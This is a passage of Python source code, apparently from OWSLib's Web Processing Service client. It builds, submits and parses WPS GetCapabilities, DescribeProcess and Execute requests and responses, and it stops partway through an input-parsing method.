              In particular, a few classes are included in the package to support a FeatureCollection input:
* "WFSFeatureCollection" can be used in conjunction with "WFSQuery" to define a FEATURE_COLLECTION
retrieved from a live WFS server.
* "GMLMultiPolygonFeatureCollection" can be used to define one or more polygons
of (latitude, longitude) points.
* "output" is an optional output identifier to be included in the ResponseForm section of the request.
* the optional keyword argument "response" mey be used to avoid submitting a real live request, and instead
reading the WPS execution response document from a cached XML file (for debugging or testing purposes)
* the convenience module function monitorExecution() can be used to periodically check the status of a remote
running job, and eventually download the output either to a named file, or to a file specified by the server.
Examples
--------
The files examples/wps-usgs-script.py, examples/wps-pml-script-1.py and examples/wps-pml-script-2.py contain
real-world usage examples that submits a "GetCapabilities", "DescribeProcess" and "Execute" requests to
the live USGS and PML servers. To run:
* cd examples
* python wps-usgs-script.py
* python wps-pml-script-1.py
* python wps-pml-script-2.py
The file wps-client.py contains a command-line client that can be used to submit a "GetCapabilities",
"DescribeProcess" or "Execute" request to an arbitratry WPS server. For example, you can run it as follows:
* cd examples
* To print out usage and example invocations: wps-client -help
* To execute a (fake) WPS invocation::
$ wps-client.py -v -u http://cida.usgs.gov/climate/gdp/process/WebProcessingService -r GetCapabilities -x ../tests/USGSCapabilities.xml # noqa
The directory tests/ includes several doctest-style files wps_*.txt that show how to interactively submit a
"GetCapabilities", "DescribeProcess" or "Execute" request, without making a live request but rather parsing the
response of cached XML response documents. To run:
* cd tests
* python -m doctest wps_*.txt
``(or python -m doctest -v wps_*.txt for verbose output)``
Also, the directory tests/ contains several examples of well-formed "Execute" requests:
* The files wps_USGSExecuteRequest*.xml contain requests that can be submitted to the live USGS WPS service.
* The files PMLExecuteRequest*.xml contain requests that can be submitted to the live PML WPS service.
"""
from owslib.etree import etree
from owslib.ows import DEFAULT_OWS_NAMESPACE, XLINK_NAMESPACE
from owslib.ows import ServiceIdentification, ServiceProvider, OperationsMetadata, BoundingBox
from time import sleep
from owslib.util import (testXMLValue, testXMLAttribute, build_get_url, clean_ows_url, dump, getTypedValue,
getNamespace, element_to_string, nspath, openURL, nspath_eval, log, Authentication)
from xml.dom.minidom import parseString
from owslib.namespaces import Namespaces
from urllib.parse import urlparse
# namespace definition
n = Namespaces()
# These static namespaces are DEPRECATED. Please don't use them.
# No great way of printing a message since these are defined at the file level
WPS_DEFAULT_NAMESPACE = n.get_namespace("wps")
WFS_NAMESPACE = n.get_namespace("wfs")
OGC_NAMESPACE = n.get_namespace("ogc")
GML_NAMESPACE = n.get_namespace("gml")
DRAW_NAMESPACE = n.get_namespace("draw")
GML_SCHEMA_LOCATION = "http://schemas.opengis.net/gml/3.1.1/base/feature.xsd"
DRAW_SCHEMA_LOCATION = 'http://cida.usgs.gov/climate/derivative/xsd/draw.xsd'
WFS_SCHEMA_LOCATION = 'http://schemas.opengis.net/wfs/1.1.0/wfs.xsd'
WPS_DEFAULT_SCHEMA_LOCATION = 'http://schemas.opengis.net/wps/1.0.0/wpsExecute_request.xsd'
WPS_DEFAULT_VERSION = '1.0.0'
# WPS execution modes
AUTO = 'auto'
SYNC = 'sync'
ASYNC = 'async'
def get_namespaces():
ns = n.get_namespaces(["ogc", "wfs", "wps", "gml", "xsi", "xlink"])
ns[None] = n.get_namespace("wps")
ns["ows"] = DEFAULT_OWS_NAMESPACE
return ns
namespaces = get_namespaces()
def is_reference(val):
"""
Checks if the provided value is a reference (URL).
"""
try:
parsed = urlparse(val)
is_ref = bool(parsed.scheme)
except Exception:
is_ref = False
return is_ref
def is_literaldata(val):
"""
Checks if the provided value is a string (includes unicode).
"""
return isinstance(val, str)
def is_boundingboxdata(val):
"""
Checks if the provided value is an implementation of ``BoundingBoxDataInput``.
"""
return isinstance(val, BoundingBoxDataInput)
def is_complexdata(val):
"""
Checks if the provided value is an implementation of ``IComplexDataInput``.
"""
return isinstance(val, IComplexDataInput)
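# These helper functions drive input dispatch in WPSExecution.buildRequest():
# plain strings are serialized as wps:LiteralData, BoundingBoxDataInput objects
# as wps:BoundingBoxData, and IComplexDataInput implementations contribute their
# own XML snippet via getXml().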
class IComplexDataInput(object):
"""
Abstract interface representing complex input object for a WPS request.
"""
def getXml(self):
"""
Method that returns the object data as an XML snippet,
to be inserted into the WPS request document sent to the server.
"""
raise NotImplementedError
class WebProcessingService(object):
"""
Class that contains client-side functionality for invoking an OGC Web Processing Service (WPS).
Implements IWebProcessingService.
"""
def __init__(self, url, version=WPS_DEFAULT_VERSION, username=None, password=None, verbose=False, skip_caps=False,
headers=None, verify=True, cert=None, timeout=None, auth=None):
"""
Initialization method resets the object status.
By default it will execute a GetCapabilities invocation to the remote service,
which can be skipped by using skip_caps=True.
"""
if auth:
if username:
auth.username = username
if password:
auth.password = password
if cert:
auth.cert = cert
if verify:
auth.verify = verify
self.auth = auth or Authentication(username, password, cert, verify)
# fields passed in from object initializer
self.url = clean_ows_url(url)
self.version = version
self.verbose = verbose
self.headers = headers
self.timeout = timeout
# fields populated by method invocations
self._capabilities = None
self.identification = None
self.provider = None
self.operations = []
self.processes = []
if not skip_caps:
self.getcapabilities()
def getcapabilities(self, xml=None):
"""
Method that requests a capabilities document from the remote WPS server and populates this object's metadata.
keyword argument xml: local XML GetCapabilities document, prevents actual HTTP invocation.
"""
# read capabilities document
reader = WPSCapabilitiesReader(
version=self.version, verbose=self.verbose, auth=self.auth)
if xml:
# read from stored XML file
self._capabilities = reader.readFromString(xml)
else:
self._capabilities = reader.readFromUrl(
self.url, headers=self.headers)
log.debug(element_to_string(self._capabilities))
        # populate the capabilities metadata objects from the XML tree
self._parseCapabilitiesMetadata(self._capabilities)
def describeprocess(self, identifier, xml=None):
"""
Requests a process document from a WPS service and populates the process metadata.
Returns the process object or a list of process objects.
:param str identifier: The process id. If `all`, return a list of all processes available.
"""
# read capabilities document
reader = WPSDescribeProcessReader(
version=self.version, verbose=self.verbose, auth=self.auth)
if xml:
# read from stored XML file
rootElement = reader.readFromString(xml)
else:
# read from server
rootElement = reader.readFromUrl(
self.url, identifier, headers=self.headers)
log.info(element_to_string(rootElement))
# build metadata objects
processes = self._parseProcessMetadata(rootElement)
if identifier == 'all':
return processes
else:
return processes[0]
def execute(self, identifier, inputs, output=None, mode=ASYNC, lineage=False, request=None, response=None):
"""
Submits a WPS process execution request.
Returns a WPSExecution object, which can be used to monitor the status of the job, and ultimately
retrieve the result.
:param str identifier: the requested process identifier
:param inputs: list of process inputs as (input_identifier, value) tuples (where value is either a string
for LiteralData, or an object for ComplexData).
:param output: optional list of process outputs as tuples (output_identifier, as_ref, mime_type).
`as_ref` can be True (as reference),
False (embedded in response) or None (use service default).
`mime_type` should be text or None (use service default)
:param mode: execution mode: SYNC, ASYNC or AUTO. Default: ASYNC
:param lineage: if lineage is "true", the Execute operation response shall include the DataInputs and
OutputDefinitions elements.
:param request: optional pre-built XML request document, prevents building of request from other arguments
:param response: optional pre-built XML response document, prevents submission of request to live WPS server
"""
# instantiate a WPSExecution object
log.info('Executing WPS request...')
execution = WPSExecution(
version=self.version,
url=self.url,
verbose=self.verbose,
headers=self.headers,
timeout=self.timeout,
auth=self.auth
)
# build XML request from parameters
if request is None:
requestElement = execution.buildRequest(identifier, inputs, output, mode=mode, lineage=lineage)
request = etree.tostring(requestElement)
execution.request = request
log.debug(request)
# submit the request to the live server
if response is None:
response = execution.submitRequest(request)
else:
response = etree.fromstring(response)
log.debug(etree.tostring(response))
# parse response
execution.parseResponse(response)
return execution
def getOperationByName(self, name):
"""Return a named content item."""
for item in self.operations:
if item.name == name:
return item
raise KeyError("No operation named %s" % name)
def _parseProcessMetadata(self, rootElement):
"""Return a list of Process objects parsed from a <ProcessDescriptions> XML element."""
processDescriptionElements = rootElement.findall('ProcessDescription')
processes = []
for processDescriptionElement in processDescriptionElements:
process = Process(processDescriptionElement, verbose=self.verbose)
            # override existing processes in object metadata, if already present
found = False
for n, p in enumerate(self.processes):
if p.identifier == process.identifier:
self.processes[n] = process
found = True
# otherwise add it
if not found:
self.processes.append(process)
processes.append(process)
return processes
def _parseCapabilitiesMetadata(self, root):
"""Set up capabilities metadata objects."""
        # reset metadata
self.operations = []
self.processes = []
# use the WPS namespace defined in the document root
# TODO: wpsns not used
# wpsns = getNamespace(root)
self.updateSequence = root.attrib.get('updateSequence')
# loop over children WITHOUT requiring a specific namespace
for element in root:
            # this element's namespace
ns = getNamespace(element)
# <ows:ServiceIdentification> metadata
if element.tag.endswith('ServiceIdentification'):
self.identification = ServiceIdentification(
element, namespace=ns)
if self.verbose is True:
dump(self.identification)
# <ows:ServiceProvider> metadata
elif element.tag.endswith('ServiceProvider'):
self.provider = ServiceProvider(element, namespace=ns)
if self.verbose is True:
dump(self.provider)
# <ns0:OperationsMetadata xmlns:ns0="http://www.opengeospatial.net/ows">
# <ns0:Operation name="GetCapabilities">
# <ns0:DCP>
# <ns0:HTTP>
# <ns0:Get xlink:href="http://ceda-wps2.badc.rl.ac.uk/wps?" xmlns:xlink="http://www.w3.org/1999/xlink" /> # noqa
# </ns0:HTTP>
# </ns0:DCP>
# </ns0:Operation>
# ........
# </ns0:OperationsMetadata>
elif element.tag.endswith('OperationsMetadata'):
for child in element.findall(nspath('Operation', ns=ns)):
self.operations.append(
OperationsMetadata(child, namespace=ns))
if self.verbose is True:
dump(self.operations[-1])
# <wps:ProcessOfferings>
# <wps:Process ns0:processVersion="1.0.0">
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">gov.usgs.cida.gdp.wps.algorithm.filemanagement.ReceiveFiles</ows:Identifier> # noqa
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">gov.usgs.cida.gdp.wps.algorithm.filemanagement.ReceiveFiles</ows:Title> # noqa
# </wps:Process>
# ......
# </wps:ProcessOfferings>
elif element.tag.endswith('ProcessOfferings'):
for child in element.findall(nspath('Process', ns=ns)):
p = Process(child, verbose=self.verbose)
self.processes.append(p)
if self.verbose is True:
dump(self.processes[-1])
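# Illustrative (commented) sketch of the input and output forms accepted by
# execute() above; identifiers, values and the URL are placeholders, and `wps`
# is assumed to be a WebProcessingService instance:
#
#   from owslib.wps import ComplexDataInput, BoundingBoxDataInput
#
#   inputs = [
#       ('literal_param', '42'),                                     # LiteralData
#       ('complex_param', ComplexDataInput(
#           'http://example.org/data.xml', mimeType='text/xml')),    # ComplexData by reference
#       ('bbox_param', BoundingBoxDataInput(
#           [10, 50, 20, 60], crs='epsg:4326')),                     # BoundingBoxData
#   ]
#   execution = wps.execute('my.process.identifier', inputs,
#                           output=[('OUTPUT', True, 'application/json')])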
class WPSReader(object):
"""
Superclass for reading a WPS document into a lxml.etree infoset.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=30, auth=None):
self.version = version
self.verbose = verbose
self.timeout = timeout
self.auth = auth or Authentication()
def _readFromUrl(self, url, data, timeout, method='Get', username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to get and parse a WPS document, returning an elementtree instance.
:param str url: WPS service base url.
:param str data: GET: dictionary of HTTP (key, value) parameter pairs, POST: XML document to post
:param str username: optional user credentials
:param str password: optional user credentials
"""
username = username or self.auth.username
password = password or self.auth.password
cert = cert or self.auth.cert
verify = verify or self.auth.verify
if method == 'Get':
# full HTTP request url
request_url = build_get_url(url, data, overwrite=True)
log.debug(request_url)
# split URL into base url and query string to use utility function
spliturl = request_url.split('?')
u = openURL(spliturl[0], spliturl[
1], method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert, timeout=self.timeout)
return etree.fromstring(u.read())
elif method == 'Post':
u = openURL(url, data, method='Post',
username=username, password=password,
headers=headers, verify=verify, cert=cert, timeout=timeout)
return etree.fromstring(u.read())
else:
raise Exception("Unrecognized HTTP method: %s" % method)
def readFromString(self, string):
"""
Method to read a WPS GetCapabilities document from an XML string.
"""
if not isinstance(string, str) and not isinstance(string, bytes):
raise ValueError(
"Input must be of type string, not %s" % type(string))
return etree.fromstring(string)
class WPSCapabilitiesReader(WPSReader):
"""
Utility class that reads and parses a WPS GetCapabilities document into a lxml.etree infoset.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSCapabilitiesReader, self).__init__(
version=version, verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to get and parse a WPS capabilities document, returning an elementtree instance.
:param str url: WPS service base url, to which is appended the HTTP parameters: service, version, and request.
:param str username: optional user credentials
:param str password: optional user credentials
"""
return self._readFromUrl(url,
{'service': 'WPS', 'request':
'GetCapabilities', 'version': self.version},
self.timeout,
username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSDescribeProcessReader(WPSReader):
"""
    Class that reads and parses a WPS DescribeProcess document into an etree infoset
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSDescribeProcessReader, self).__init__(
version=version, verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, identifier, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Reads a WPS DescribeProcess document from a remote service and returns the XML etree object
:param str url: WPS service base url, to which is appended the HTTP parameters: 'service', 'version',
'request', and 'identifier'.
"""
return self._readFromUrl(url,
{'service': 'WPS', 'request': 'DescribeProcess',
'version': self.version, 'identifier': identifier},
self.timeout,
username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSExecuteReader(WPSReader):
"""
    Class that reads and parses a WPS Execute response document into an etree infoset
"""
def __init__(self, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSExecuteReader, self).__init__(verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, data={}, method='Get', username=None, password=None,
headers=None, verify=True, cert=None):
"""
Reads a WPS status document from a remote service and returns the XML etree object.
:param str url: the URL to submit the GET/POST request to.
"""
return self._readFromUrl(url, data, self.timeout, method, username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSExecution(object):
"""
Class that represents a single WPS process executed on a remote WPS service.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, url=None, username=None, password=None, verbose=False,
headers=None, verify=True, cert=None, timeout=None, auth=None):
if auth:
if username:
auth.username = username
if password:
auth.password = password
if cert:
auth.cert = cert
if verify:
auth.verify = verify
# initialize fields
self.url = url
self.version = version
self.verbose = verbose
self.headers = headers
self.auth = auth or Authentication(username, password, cert, verify)
self.timeout = timeout
# request document
self.request = None
# last response document
self.response = None
# status fields retrieved from the response documents
self.process = None
self.serviceInstance = None
self.status = None
self.percentCompleted = 0
self.statusMessage = None
self.errors = []
self.statusLocation = None
self.dataInputs = []
self.processOutputs = []
self.creationTime = None
def buildRequest(self, identifier, inputs=[], output=None, mode=ASYNC, lineage=False):
"""
Method to build a WPS process request.
:param str identifier: the requested process identifier
:param inputs: array of input arguments for the process.
- LiteralData inputs are expressed as simple (key,value) tuples where key is the input identifier,
value is the value
- ComplexData inputs are expressed as (key, object) tuples, where key is the input identifier,
and the object must contain a 'getXml()' method that returns an XML infoset to be included in
the WPS request
:param output: array of outputs which should be returned:
            expressed as tuples (key, as_ref, mime_type) where key is the output identifier and as_ref is True
            if output should be returned as reference.
            as_ref and mime_type may be None to use the server's default value
:param mode: execution mode: SYNC, ASYNC or AUTO.
:param lineage: if lineage is "true", the Execute operation response shall include the DataInputs and
OutputDefinitions elements.
"""
        # TODO: auto mode needs to be implemented for WPS 2.0.0
if mode is SYNC:
_async = False
elif mode is AUTO:
log.warn("Auto mode not available in WPS 1.0.0. Using async mode.")
_async = True
else:
_async = True
# <wps:Execute xmlns:wps="http://www.opengis.net/wps/1.0.0"
# xmlns:ows="http://www.opengis.net/ows/1.1"
# xmlns:xlink="http://www.w3.org/1999/xlink"
# xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
# service="WPS"
# version="1.0.0"
# xsi:schemaLocation="http://www.opengis.net/wps/1.0.0
# http://schemas.opengis.net/wps/1.0.0/wpsExecute_request.xsd">
root = etree.Element(nspath_eval('wps:Execute', namespaces))
root.set('service', 'WPS')
root.set('version', WPS_DEFAULT_VERSION)
root.set(nspath_eval('xsi:schemaLocation', namespaces), '%s %s' %
(namespaces['wps'], WPS_DEFAULT_SCHEMA_LOCATION))
# <ows:Identifier>gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm</ows:Identifier>
identifierElement = etree.SubElement(
root, nspath_eval('ows:Identifier', namespaces))
identifierElement.text = identifier
# <wps:DataInputs>
dataInputsElement = etree.SubElement(
root, nspath_eval('wps:DataInputs', namespaces))
for (key, val) in inputs:
inputElement = etree.SubElement(
dataInputsElement, nspath_eval('wps:Input', namespaces))
identifierElement = etree.SubElement(
inputElement, nspath_eval('ows:Identifier', namespaces))
identifierElement.text = key
# Literal data
# <wps:Input>
# <ows:Identifier>DATASET_URI</ows:Identifier>
# <wps:Data>
# <wps:LiteralData>dods://igsarm-cida-thredds1.er.usgs.gov:8080/thredds/dodsC/dcp/conus_grid.w_meta.ncml</wps:LiteralData>
# </wps:Data>
# </wps:Input>
if is_literaldata(val):
log.debug("literaldata %s", key)
dataElement = etree.SubElement(
inputElement, nspath_eval('wps:Data', namespaces))
literalDataElement = etree.SubElement(
dataElement, nspath_eval('wps:LiteralData', namespaces))
literalDataElement.text = val
# Complex data
# <wps:Input>
# <ows:Identifier>FEATURE_COLLECTION</ows:Identifier>
# <wps:Reference xlink:href="http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs">
# <wps:Body>
# <wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" service="WFS" version="1.1.0" outputFormat="text/xml; subtype=gml/3.1.1" xsi:schemaLocation="http://www.opengis.net/wfs ../wfs/1.1.0/WFS.xsd"> # noqa
# <wfs:Query typeName="sample:CONUS_States">
# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
# </wfs:GetFeature>
# </wps:Body>
# </wps:Reference>
# </wps:Input>
elif is_complexdata(val):
log.debug("complexdata %s", key)
inputElement.append(val.getXml())
elif is_boundingboxdata(val):
inputElement.append(val.get_xml())
else:
raise Exception(
'input type of "%s" parameter is unknown' % key)
# <wps:ResponseForm>
# <wps:ResponseDocument storeExecuteResponse="true" status="true" lineage="false">
# <wps:Output asReference="true" mimeType="application/json">
# <ows:Identifier>OUTPUT</ows:Identifier>
# </wps:Output>
# </wps:ResponseDocument>
# </wps:ResponseForm>
if output is not None:
responseFormElement = etree.SubElement(
root, nspath_eval('wps:ResponseForm', namespaces))
responseDocumentElement = etree.SubElement(
responseFormElement, nspath_eval(
'wps:ResponseDocument', namespaces),
attrib={'storeExecuteResponse': str(_async).lower(),
'status': str(_async).lower(),
'lineage': str(lineage).lower()})
            # keeping backward compatibility of output parameter
if isinstance(output, str):
self._add_output(responseDocumentElement, output)
elif isinstance(output, list):
for ouputTuple in output:
# tuple (identifier, as_reference) for backward compatibility
if(len(ouputTuple) == 2):
(identifier, as_reference) = ouputTuple
mime_type = None
else:
(identifier, as_reference, mime_type) = ouputTuple
self._add_output(
responseDocumentElement, identifier, asReference=as_reference, mimeType=mime_type)
else:
raise Exception(
'output parameter is neither string nor list. output=%s' % output)
return root
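    # The "output" argument handled above accepts several equivalent forms, kept
    # for backward compatibility; illustrative values:
    #   output='OUTPUT'                                # single identifier
    #   output=[('OUTPUT', True)]                      # (identifier, as_reference)
    #   output=[('OUTPUT', True, 'application/json')]  # (identifier, as_reference, mime_type)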
def _add_output(self, element, identifier, asReference=None, mimeType=None):
output_element = etree.SubElement(
element, nspath_eval('wps:Output', namespaces))
if isinstance(mimeType, str):
output_element.attrib['mimeType'] = mimeType
if isinstance(asReference, bool):
output_element.attrib['asReference'] = str(asReference).lower()
# outputIdentifierElement
etree.SubElement(
output_element, nspath_eval('ows:Identifier', namespaces)).text = identifier
# wait for 60 seconds by default
def checkStatus(self, url=None, response=None, sleepSecs=60):
"""
Method to check the status of a job execution.
In the process, this method will update the object 'response' attribute.
:param str url: optional 'statusLocation' URL retrieved from a previous WPS Execute response document.
If not provided, the current 'statusLocation' URL will be used.
:param int sleepSecs: number of seconds to sleep before returning control to the caller.
"""
reader = WPSExecuteReader(verbose=self.verbose, auth=self.auth)
if response is None:
# override status location
if url is not None:
self.statusLocation = url
log.info('\nChecking execution status... (location=%s)' %
self.statusLocation)
try:
response = reader.readFromUrl(
self.statusLocation, headers=self.headers)
except Exception:
log.error("Could not read status document.")
else:
response = reader.readFromString(response)
# store latest response
try:
xml = etree.tostring(response)
except Exception:
log.error("Could not parse XML response.")
else:
self.response = xml
log.debug(self.response)
self.parseResponse(response)
# sleep given number of seconds
if self.isComplete() is False:
log.info('Sleeping %d seconds...' % sleepSecs)
sleep(sleepSecs)
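    # Typical (commented) polling sketch combining checkStatus() above with the
    # status helpers below; the sleep interval and output path are illustrative:
    #
    #   while execution.isNotComplete():
    #       execution.checkStatus(sleepSecs=10)
    #   if execution.isSucceded():
    #       execution.getOutput('result.out')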
def getStatus(self):
return self.status
def isComplete(self):
if (self.status == 'ProcessSucceeded' or self.status == 'ProcessFailed' or self.status == 'Exception'):
return True
elif (self.status == 'ProcessStarted'):
return False
elif (self.status == 'ProcessAccepted' or self.status == 'ProcessPaused'):
return False
else:
raise Exception(
'Unknown process execution status: %s' % self.status)
def isSucceded(self):
if self.status == 'ProcessSucceeded':
return True
else:
return False
def isNotComplete(self):
return not self.isComplete()
def getOutput(self, filepath=None):
"""
Method to write the outputs of a WPS process to a file:
either retrieves the referenced files from the server, or writes out the content of response embedded output.
:param filepath: optional path to the output file, otherwise a file will be created in the local directory with
the name assigned by the server, or default name 'wps.out' for embedded output.
"""
if self.isSucceded():
content = b''
for output in self.processOutputs:
output_content = output.retrieveData(
self.auth.username, self.auth.password,
headers=self.headers, verify=self.auth.verify, cert=self.auth.cert)
# ExecuteResponse contains reference to server-side output
if output_content != b'':
content = content + output_content
if filepath is None:
filepath = output.fileName
                # ExecuteResponse contains embedded output
                if len(output.data) > 0:
                    if filepath is None:
                        filepath = 'wps.out'
                    for data in output.data:
                        # embedded data may be str or bytes (e.g. from etree.tostring)
                        content = content + (data if isinstance(data, bytes) else str(data).encode())
            # write out content
            if content != b'':
out = open(filepath, 'wb')
out.write(content)
out.close()
log.info('Output written to file: %s' % filepath)
else:
raise Exception(
"Execution not successfully completed: status=%s" % self.status)
def submitRequest(self, request):
"""
Submits a WPS Execute document to a remote service, returns the XML response document from the server.
This method will save the request document and the first returned response document.
:param request: the XML request document to be submitted as POST to the server.
"""
self.request = request
reader = WPSExecuteReader(verbose=self.verbose, timeout=self.timeout, auth=self.auth)
response = reader.readFromUrl(
self.url, request, method='Post', headers=self.headers)
self.response = response
return response
'''
if response is None:
# override status location
if url is not None:
self.statusLocation = url
else:
response = reader.readFromString(response)
'''
def parseResponse(self, response):
"""
Method to parse a WPS response document
"""
rootTag = response.tag.split('}')[1]
# <ns0:ExecuteResponse>
if rootTag == 'ExecuteResponse':
self._parseExecuteResponse(response)
# <ows:ExceptionReport>
elif rootTag == 'ExceptionReport':
self._parseExceptionReport(response)
else:
log.debug('Unknown Response')
# log status, errors
log.info('Execution status=%s' % self.status)
log.info('Percent completed=%s' % self.percentCompleted)
log.info('Status message=%s' % self.statusMessage)
for error in self.errors:
dump(error)
def _parseExceptionReport(self, root):
"""
Method to parse a WPS ExceptionReport document and populate this object's metadata.
"""
# set exception status
self.status = "Exception"
for exceptionEl in root.findall(nspath('Exception', ns=namespaces['ows'])):
self.errors.append(WPSException(exceptionEl))
def _parseExecuteResponse(self, root):
"""
Method to parse a WPS ExecuteResponse response document and populate this object's metadata.
"""
# retrieve WPS namespace directly from root element
wpsns = getNamespace(root)
self.serviceInstance = root.get('serviceInstance')
if self.statusLocation is None:
self.statusLocation = root.get('statusLocation')
# <ns0:Status creationTime="2011-11-09T14:19:50Z">
# <ns0:ProcessSucceeded>PyWPS Process v.net.path successfully calculated</ns0:ProcessSucceeded>
# </ns0:Status>
# OR
# <ns0:Status creationTime="2011-11-07T08:26:44.359-06:00">
# <ns0:ProcessFailed>
# <ows:ExceptionReport xmlns:ows="http://www.opengis.net/ows/1.1">
# <ows:Exception>
# <ows:ExceptionText>Attribute null not found in feature collection</ows:ExceptionText>
# </ows:Exception>
# </ows:ExceptionReport>
# </ns0:ProcessFailed>
# </ns0:Status>
statusEl = root.find(nspath('Status/*', ns=wpsns))
self.status = statusEl.tag.split('}')[1]
# creationTime attribute
element = root.find(nspath('Status', ns=wpsns))
self.creationTime = testXMLAttribute(element, 'creationTime')
# get progress info
if self.status == 'ProcessSucceeded':
self.percentCompleted = 100
else:
try:
percentCompleted = int(statusEl.get('percentCompleted'))
self.percentCompleted = percentCompleted
except Exception:
pass
# get status message
self.statusMessage = statusEl.text
# exceptions ?
for element in statusEl:
if element.tag.endswith('ExceptionReport'):
self._parseExceptionReport(element)
self.process = Process(
root.find(nspath('Process', ns=wpsns)), verbose=self.verbose)
# <wps:DataInputs xmlns:wps="http://www.opengis.net/wps/1.0.0"
# xmlns:ows="http://www.opengis.net/ows/1.1"
# xmlns:xlink="http://www.w3.org/1999/xlink">
if len(self.dataInputs) > 0:
log.debug('clean data inputs')
self.dataInputs[:] = []
for inputElement in root.findall(nspath('DataInputs/Input', ns=wpsns)):
self.dataInputs.append(Output(inputElement))
if self.verbose is True:
dump(self.dataInputs[-1])
# <ns:ProcessOutputs>
# xmlns:ns="http://www.opengis.net/wps/1.0.0"
if len(self.processOutputs) > 0:
log.debug('clean process outputs')
self.processOutputs[:] = []
for outputElement in root.findall(nspath('ProcessOutputs/Output', ns=wpsns)):
self.processOutputs.append(Output(outputElement))
if self.verbose is True:
dump(self.processOutputs[-1])
class ComplexData(object):
"""
Class that represents a ComplexData element in a WPS document
"""
def __init__(self, mimeType=None, encoding=None, schema=None):
self.mimeType = mimeType
self.encoding = encoding
self.schema = schema
class InputOutput(object):
"""
Superclass of a WPS input or output data object.
"""
def __init__(self, element):
self.abstract = None
self.metadata = []
# loop over sub-elements without requiring a specific namespace
for child in element:
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">SUMMARIZE_TIMESTEP</ows:Identifier>
if child.tag.endswith('Identifier'):
self.identifier = testXMLValue(child)
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">Summarize Timestep</ows:Title>
elif child.tag.endswith('Title'):
self.title = testXMLValue(child)
# <ows:Abstract xmlns:ows="http://www.opengis.net/ows/1.1">
# If selected, processing output will include columns with summarized statistics for all
# feature attribute values for each timestep
# </ows:Abstract>
elif child.tag.endswith('Abstract'):
self.abstract = testXMLValue(child)
# <ows:Metadata xlink:title="Documentation" xlink:href="http://emu.readthedocs.org/en/latest/"/>
elif child.tag.endswith('Metadata'):
self.metadata.append(Metadata(child))
self.allowedValues = []
self.supportedValues = []
self.defaultValue = None
self.dataType = None
self.anyValue = False
def _parseData(self, element):
"""
Method to parse a "Data" element
"""
# <ns0:Data>
# <ns0:ComplexData mimeType="text/plain">
# 7504912.93758151 -764109.175074507,7750849.82379226 -22141.8611641468,8561828.42371234 -897195.923493867,7724946.16844165 -602984.014261927 # noqa
# </ns0:ComplexData>
# </ns0:Data>
# nspath('Data', ns=WPS_NAMESPACE)
complex_data_element = element.find(
nspath('ComplexData', ns=getNamespace(element)))
if complex_data_element is not None:
self.dataType = "ComplexData"
def _parseLiteralData(self, element, literalElementName):
"""
Method to parse the LiteralData element.
"""
# <LiteralData>
# <ows:DataType ows:reference="xs:string" xmlns:ows="http://www.opengis.net/ows/1.1" />
# <ows:AllowedValues xmlns:ows="http://www.opengis.net/ows/1.1">
# <ows:Value>COMMA</ows:Value>
# <ows:Value>TAB</ows:Value>
# <ows:Value>SPACE</ows:Value>
# </ows:AllowedValues>
# <DefaultValue>COMMA</DefaultValue>
# </LiteralData>
# <LiteralData>
# <ows:DataType ows:reference="xs:anyURI" xmlns:ows="http://www.opengis.net/ows/1.1" />
# <ows:AnyValue xmlns:ows="http://www.opengis.net/ows/1.1" />
# </LiteralData>
literal_data_element = element.find(literalElementName)
if literal_data_element is not None:
self.dataType = 'LiteralData'
for sub_element in literal_data_element:
subns = getNamespace(sub_element)
if sub_element.tag.endswith('DataType'):
self.dataType = sub_element.text
if not self.dataType:
reference = sub_element.get(nspath("reference", ns=subns))
# backward search of first non-alpha character (:, #, /, etc.)
pos = len(reference) - 1
while pos >= 0 and reference[pos].isalpha():
pos -= 1
# obtain substring after found non-alpha character position
self.dataType = reference[pos + 1:]
for sub_element in literal_data_element:
subns = getNamespace(sub_element)
if sub_element.tag.endswith('DefaultValue'):
self.defaultValue = getTypedValue(
self.dataType, sub_element.text)
if sub_element.tag.endswith('AllowedValues'):
for value in sub_element.findall(nspath('Value', ns=subns)):
self.allowedValues.append(
getTypedValue(self.dataType, value.text))
elif sub_element.tag.endswith('AnyValue'):
self.anyValue = True
def _parseComplexData(self, element, complexDataElementName):
"""
Method to parse a ComplexData or ComplexOutput element.
"""
# <ComplexData>
# <Default>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.0.0/feature.xsd</Schema>
# </Format>
# </Default>
# <Supported>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.0.0/feature.xsd</Schema>
# </Format>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.1.1/feature.xsd</Schema>
# </Format>
# </Supported>
